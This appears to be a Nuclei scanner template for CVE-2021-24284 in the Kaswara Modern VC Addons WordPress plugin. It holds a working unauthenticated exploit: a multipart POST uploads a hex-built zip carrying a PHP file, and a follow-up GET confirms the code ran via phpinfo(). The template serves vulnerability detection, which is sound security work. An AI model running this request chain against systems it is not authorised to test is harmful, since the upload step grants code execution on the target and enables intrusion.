id: CVE-2021-24284

info:
  name: WordPress Kaswara Modern VC Addons - File Upload RCE
  author: lamscun,pussycat0x,pdteam
  severity: critical
  description: |
    The Kaswara Modern VC Addons WordPress plugin through 3.0.1 allows unauthenticated arbitrary file upload via the 'uploadFontIcon' AJAX action. The supplied zipfile being unzipped in the wp-content/uploads/kaswara/fonts_icon directory with no checks for malicious files such as PHP.
  reference:
    - https://wpscan.com/vulnerability/8d66e338-a88f-4610-8d12-43e8be2da8c5
    - https://github.com/advisories/GHSA-wqvg-8q49-hjc7
    - https://www.wordfence.com/blog/2021/04/psa-remove-kaswara-modern-wpbakery-page-builder-addons-plugin-immediately/
    - https://www.waltermairena.net/en/2021/04/25/0-day-vulnerability-in-the-plugin-kaswara-modern-vc-addons-plugin-what-can-i-do/
    - https://lifeinhex.com/kaswara-exploit-or-how-much-wordfence-cares-about-user-security/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24284
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-24284
    cwe-id: CWE-434
  tags: intrusive,unauth,fileupload,wpscan,cve,wordpress,wp-plugin,rce,cve2021,wp

variables:
  zip_file: "{{to_lower(rand_text_alpha(6))}}"
  php_file: "{{to_lower(rand_text_alpha(2))}}.php"
  php_cmd: "<?php phpinfo();?>"

requests:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php?action=uploadFontIcon HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=------------------------d3be34324392a708

        --------------------------d3be34324392a708
        Content-Disposition: form-data; name="fonticonzipfile"; filename="{{zip_file}}.zip"
        Content-Type: application/octet-stream

        {{hex_decode('504B03040A0000000000FA73F454B2333E07140000001400000006001C00')}}{{php_file}}{{hex_decode('555409000366CBD76267CBD76275780B000104F50100000414000000')}}{{php_cmd}}{{hex_decode('0A504B01021E030A00000000002978F454E49BC1591300000013000000060018000000000001000000A48100000000')}}{{php_file}}{{hex_decode('555405000366CBD76275780B000104F50100000414000000504B050600000000010001004C000000530000000000')}}
        --------------------------d3be34324392a708
        Content-Disposition: form-data; name="fontsetname"

        {{zip_file}}
        --------------------------d3be34324392a708
        Content-Disposition: form-data; name="action"

        uploadFontIcon
        --------------------------d3be34324392a708--

      - |
        GET /wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/{{php_file}} HTTP/1.1
        Host: {{Hostname}}

    req-condition: true
    matchers-condition: and
    matchers:
      - type: word
        part: body_1
        words:
          - "wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/style.css"

      - type: word
        part: body_2
        words:
          - "phpinfo()"

      - type: status
        status:
          - 200